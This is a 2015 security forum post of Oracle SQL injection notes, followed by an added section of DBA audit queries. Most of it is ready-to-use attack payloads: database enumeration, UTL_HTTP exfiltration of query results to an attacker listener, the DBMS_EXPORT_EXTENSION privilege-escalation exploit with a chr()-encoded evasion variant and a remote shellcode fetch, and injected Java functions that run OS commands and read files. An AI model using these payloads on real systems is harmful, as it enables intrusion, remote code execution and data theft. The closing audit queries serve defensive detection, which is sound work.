
[Safe Communication] SQL injection notes: Oracle

Posted on 1/24/2015 12:58:17 PM
This post was last edited by test on 2015-1-24 13:01

Comment syntax: --
Stacked (multi-statement) execution is not supported; UNION queries are supported.
Database names, table names and column names are all upper case.


length(field)
ascii(substr(field, N, 1))


and (select count(*) from dual)>0 -- Determine whether it is oracle or not

order by n--

and 1=2 union select null, null,.....,null from dual-- replace null with N or 'N'

and 1=2 union select null, (sql statement) ,.....,null from dual -- put the (sql statement) in the column whose 'N' is echoed on the page

and (select count(*) from all_objects where object_name='UTL_HTTP')>0 -- Determine whether UTL_HTTP is available (requires the database's egress IP to be known)

and UTL_HTTP.request('http://LocalIP:port'|| (SQL statement)) =1-- sends the result to your host remotely; listen locally with nc -vv -l -p 1234


SQL statements
select banner from sys.v_$version where rownum=1 -- Oracle version
select member from v$logfile where rownum=1 -- log file path (reveals Windows or Linux)
select utl_inaddr.get_host_address from dual -- database host IP
select instance_name from v$instance -- SID
select name from v$database -- current database name
select sys_context('userenv','current_user') from dual -- current database user
select * from session_roles where rownum=1 -- current user's roles (permissions)
select * from session_roles where rownum=1 and role<>'first role name' -- next role



select table_name from user_tables where rownum=1 -- first table of the current database
select table_name||','||tablespace_name from user_tables where rownum=1 -- first table with its tablespace name (for cross-checking; it may not match v$database)
select table_name from user_tables where rownum=1 and table_name<>'first table name' -- second table of the current database

select column_name from user_tab_columns where rownum=1 and table_name='table name' -- first field of that table
select column_name from user_tab_columns where rownum=1 and table_name='table name' and column_name<>'first field' -- second field of that table

select field from table where rownum=1 -- reveals the first row's content
select field from table where rownum=1 and field<>'first row content' -- reveals the second row's content


Cross-database
select owner from all_tables where rownum=1 -- first database (owner) name
select owner from all_tables where rownum=1 and owner<>'first database name' -- second database name

select table_name from all_tables where rownum=1 and owner='database name' -- first table of that database
select table_name from all_tables where rownum=1 and owner='database name' and table_name<>'first table name' -- second table of that database

select column_name from all_tab_columns where rownum=1 and owner='database name' and table_name='table name' -- first field of that table
select column_name from all_tab_columns where rownum=1 and owner='database name' and table_name='table name' and column_name<>'first field' -- second field of that table

select field from database.table where rownum=1 -- reveals the first row's content
select field from database.table where rownum=1 and field<>'first row content' -- reveals the second row's content





SYS. DBMS_EXPORT_EXTENSION. GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT". PUT(:P1); multi-statement END; --','SYS',0,'1',0)--

If ' is escaped, build the strings with chr().

SYS. DBMS_EXPORT_EXTENSION. GET_DOMAIN_INDEX_TABLES(chr(70)|| chr(79)|| chr(79),chr(66)|| chr(65)|| chr(82), chr(68)|| chr(66)|| chr(77)|| chr(83)|| chr(95)|| chr(79)|| chr(85)|| chr(84)|| chr(80)|| chr(85)|| chr(84)|| chr(34)|| chr(46)|| chr(80)|| chr(85)|| chr(84)|| chr(40)|| chr(58)|| chr(80)|| chr(49)|| chr(41)|| chr(59)|| Multi-statement || chr(69)|| chr(78)|| chr(68)|| chr(59)|| chr(45)|| chr(45),chr(83)|| chr(89)|| chr(83),0,chr(49),0)=0--

If the multi-statement block is too long, place it in a file on a web site and fetch it with utl_http.request.

SYS. DBMS_EXPORT_EXTENSION. GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT". PUT(:P1); utl_http.request('http://www.guetsec.com/shellcode.txt'); --','SYS',0,'1',0)--





Create a JAVA package SecTest
runCMD is used to execute system commands
and '1'<>'a'|| (select SYS. DBMS_EXPORT_EXTENSION. GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT". PUT(:P1); EXECUTE IMMEDIATE''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE''''create or replace and compile java source named "SecTest" as import java.io.*; public class SecTest extends Object{public static String runCMD(String args){try{BufferedReader myReader=new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args) .getInputStream())); String stemp,str=""; while((stemp=myReader.readLine())!=null) str+=stemp+"\n"; myReader.close(); return str; }catch(Exception e){return e.toString(); }}}''''; END; ''; END; --','SYS',0,'1',0) from dual)--

readFile is used to read a file
and '1'<>'a'|| (select SYS. DBMS_EXPORT_EXTENSION. GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT". PUT(:P1); EXECUTE IMMEDIATE''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE''''create or replace and compile java source named "SecTest" as import java.io.*; public class SecTest extends Object{public static String readFile(String filename){try{BufferedReader myReader=new BufferedReader(new FileReader(filename)); String stemp,str=""; while((stemp=myReader.readLine())!=null) str+=stemp+"\n"; myReader.close(); return str; }catch(Exception e){return e.toString(); }}}''''; END; ''; END; --','SYS',0,'1',0) from dual)--



Grant Java permissions
and '1'<>'a'|| (select SYS. DBMS_EXPORT_EXTENSION. GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT". PUT(:P1); EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission(''''''''PUBLIC'''''''',''''''''SYS:java.io.FilePermission'''''''',''''''''<<ALL FILES>>'''''''',''''''''execute''''''''); end; ''''; END; ''; END; --','SYS',0,'1',0) from dual)--



Create a function
SecRunCMD function
and '1'<>'a'|| (select SYS. DBMS_EXPORT_EXTENSION. GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT". PUT(:P1); EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''create or replace function SecRunCMD(p_cmd in varchar2) return varchar2 as language java name''''''''SecTest.runCMD(java.lang.String) return String'''''''' ; ''''; END; ''; END; --','SYS',0,'1',0) from dual)--

SecReadFile function
and '1'<>'a'|| (select SYS. DBMS_EXPORT_EXTENSION. GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT". PUT(:P1); EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''create or replace function SecReadFile(filename in varchar2) return varchar2 as language java name''''''''SecTest.readFile(java.lang.String) return String' '''''''; ''''; END; ''; END; --','SYS',0,'1',0) from dual)--



Grant PUBLIC permission to execute the functions
SecRunCMD
and '1'<>'a'|| (select SYS. DBMS_EXPORT_EXTENSION. GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT". PUT(:P1); EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''grant all on SecRunCMD to public''''; END; ''; END; --','SYS',0,'1',0) from dual)--

SecReadFile
and '1'<>'a'|| (select SYS. DBMS_EXPORT_EXTENSION. GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT". PUT(:P1); EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''grant all on SecReadFile to public''''; END; ''; END; --','SYS',0,'1',0) from dual)--



Check whether the functions were created successfully
and (select count(*) from all_objects where object_name='SECRUNCMD')>0--
and (select count(*) from all_objects where object_name='SECREADFILE')>0--



Execute the command
and '1'<>(select sys. SecRunCMD('Execute command') from dual)--
and '1'<>(select sys. SecReadFile('file physical address') from dual)--
or
and 1=2 union select null,...,sys. SecRunCMD('execute command'),...,null from dual--
and 1=2 union select null,...,sys. SecReadFile('file physical address'),...,null from dual--
or
and '1'<>(select UTL_HTTP.request('http://LocalIP:port'|| REPLACE(REPLACE(sys. SecRunCMD('Execute Command'),' ',' '),'\n',' ')) from dual)--
and '1'<>(select UTL_HTTP.request('http://LocalIP:port'|| REPLACE(REPLACE(sys. SecReadFile('File Physical Address'),' ',' '),'\n',' ')) from dual)--



Drop the functions (cleanup)
and '1'<>'a'|| (select SYS. DBMS_EXPORT_EXTENSION. GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT". PUT(:P1); EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''drop function SecRunCMD''''; END; ''; END; --','SYS',0,'1',0) from dual)--
and '1'<>'a'|| (select SYS. DBMS_EXPORT_EXTENSION. GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT". PUT(:P1); EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''drop function SecReadFile''''; END; ''; END; --','SYS',0,'1',0) from dual)--
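As an added example (not part of the original post), these are the data-dictionary checks a DBA would run to find the exposure the chain above depends on (PUBLIC access to UTL_HTTP and DBMS_EXPORT_EXTENSION) and the artifacts it leaves behind (the SecTest Java source, the SecRunCMD/SecReadFile functions and the PUBLIC FilePermission grant). The view names are standard Oracle dictionary views; the 30-day window is an assumption.

```sql
-- Added audit queries, not from the original post; run as a DBA.
-- Assumes the standard data dictionary views named below.
-- Object names SECTEST, SECRUNCMD, SECREADFILE are the ones the post uses.

-- 1. Is the injection surface reachable from every schema?  PUBLIC EXECUTE on
--    these packages is what lets an injected query from a low-privilege web
--    account call them at all.
SELECT grantee, owner, table_name, privilege
  FROM dba_tab_privs
 WHERE table_name IN ('UTL_HTTP', 'UTL_INADDR', 'DBMS_EXPORT_EXTENSION')
   AND grantee = 'PUBLIC';

-- 2. Residual objects of the Java RCE chain: the named objects, plus any
--    Java source created under SYS recently (assumed 30-day window).
SELECT owner, object_name, object_type, created, last_ddl_time
  FROM dba_objects
 WHERE UPPER(object_name) IN ('SECTEST', 'SECRUNCMD', 'SECREADFILE')
    OR (object_type = 'JAVA SOURCE' AND owner = 'SYS'
        AND created > SYSDATE - 30);

-- 3. SYS-owned source that spawns processes or wraps a Java call, so the
--    reviewer can read exactly what such a function executes.
SELECT owner, name, type, line, text
  FROM dba_source
 WHERE owner = 'SYS'
   AND (UPPER(text) LIKE '%RUNTIME.GETRUNTIME().EXEC%'
        OR UPPER(text) LIKE '%LANGUAGE JAVA NAME%')
 ORDER BY owner, name, line;

-- 4. The Java policy grant the post adds: PUBLIC may touch <<ALL FILES>>.
--    No normal application needs this; revoke it with dbms_java.revoke_permission.
SELECT grantee, type_schema, type_name, name, action, enabled
  FROM dba_java_policy
 WHERE grantee = 'PUBLIC'
   AND type_name = 'java.io.FilePermission'
   AND name = '<<ALL FILES>>';

-- 5. SYS objects recently created and granted to PUBLIC (the post grants ALL
--    on its two functions to PUBLIC so any session can call them).
SELECT p.grantee, p.table_name, p.privilege, o.object_type, o.created
  FROM dba_tab_privs p
  JOIN dba_objects  o ON o.owner = p.owner AND o.object_name = p.table_name
 WHERE p.owner = 'SYS' AND p.grantee = 'PUBLIC'
   AND o.created > SYSDATE - 30
 ORDER BY o.created DESC;
```

Any row from query 1 means the UTL_HTTP probe and the DBMS_EXPORT_EXTENSION payloads above are reachable through an injected query; rows from queries 2 to 5 are evidence that the chain has already been run and should be treated as an incident, not just cleaned up.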



